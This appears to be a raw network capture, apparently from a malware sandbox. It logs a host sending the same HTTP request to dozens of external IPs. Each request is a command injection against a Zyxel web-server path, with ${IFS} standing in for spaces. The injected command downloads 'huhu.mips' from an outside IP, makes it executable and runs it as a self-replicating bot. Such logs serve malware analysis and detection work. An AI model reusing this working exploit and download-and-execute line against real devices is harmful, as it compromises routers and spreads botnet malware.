                                      Jan 19, 2024 17:29:01.357183933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      403192.168.2.1439414151.175.54.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:01.357208967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      404192.168.2.1433804202.9.242.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:03.364406109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      405192.168.2.144400039.166.65.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:03.364429951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      406192.168.2.143423280.16.36.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:03.364464045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      407192.168.2.1451728137.116.252.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:03.364486933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      408192.168.2.143376253.32.245.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:03.364523888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      409192.168.2.143412649.216.124.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:03.364605904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      410192.168.2.143545888.77.228.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:03.364628077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      411192.168.2.1456294128.162.189.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.371913910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      412192.168.2.1440776189.7.38.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.371938944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      413192.168.2.1460936106.128.115.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.371982098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      414192.168.2.144132046.44.21.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372030020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      415192.168.2.144798073.25.218.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372045994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      416192.168.2.1438644153.58.192.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372102022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      417192.168.2.1450874145.2.146.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372138977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      418192.168.2.144485044.90.210.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372155905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      419192.168.2.144658470.203.250.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372204065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      420192.168.2.1449598187.102.168.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372247934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      421192.168.2.1458612208.38.199.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372293949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      422192.168.2.1442824172.0.243.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372311115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      423192.168.2.1459248204.247.205.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372358084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      424192.168.2.1434140116.168.10.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372385979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      425192.168.2.1444476193.126.29.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372431993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      426192.168.2.145927213.219.97.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372478962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      427192.168.2.1449186176.98.145.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372503042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      428192.168.2.1459310147.121.112.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372550964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      429192.168.2.143959244.61.228.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372585058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      430192.168.2.146085687.19.32.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372612000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      431192.168.2.1443814104.150.222.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372667074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      432192.168.2.1445118188.77.17.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372713089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      433192.168.2.1436112183.78.41.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372761965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      434192.168.2.1441796142.43.113.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372792959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      435192.168.2.1454362151.108.107.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372838974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      436192.168.2.145689691.95.9.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372865915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      437192.168.2.143371092.109.106.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372905970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      438192.168.2.144410483.219.168.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372944117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      439192.168.2.144059285.155.175.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.372978926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      440192.168.2.144743272.12.22.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.373006105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      441192.168.2.1435286199.72.83.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.373058081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      442192.168.2.1444528194.195.82.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.373096943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      443192.168.2.144244486.94.66.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.373147964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      444192.168.2.144925682.91.87.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.373171091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      445192.168.2.1460098144.148.61.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.373186111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      446192.168.2.145018057.222.183.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.373253107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      447192.168.2.145256683.52.197.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.373287916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      448192.168.2.1435392167.235.251.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.373320103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      449192.168.2.1455134142.29.65.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:05.373864889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      450192.168.2.145893299.172.149.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:06.377258062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      451192.168.2.1444552132.131.70.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:06.377290964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      452192.168.2.1448882207.19.132.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:06.377331018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      453192.168.2.1445126164.12.102.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:06.377367020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      454192.168.2.145780896.52.250.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:06.377383947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      455192.168.2.1438192161.175.10.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:06.377425909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      456192.168.2.1453746113.182.118.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:07.381000996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      457192.168.2.144194647.164.162.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:07.381031990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      458192.168.2.1436250139.246.210.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:08.384893894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      459192.168.2.145173482.7.37.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:08.384927034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      460192.168.2.1444646206.173.2.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:08.384974957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      461192.168.2.1440338210.13.14.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:08.385004997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      462192.168.2.145230472.166.115.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:08.385097027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      463192.168.2.1447150167.79.42.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:09.391781092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      464192.168.2.1445770178.174.2.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395364046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      465192.168.2.1443082213.119.90.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395386934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      466192.168.2.145551832.24.88.198443
                                      TimestampBytes transferredDirectionData
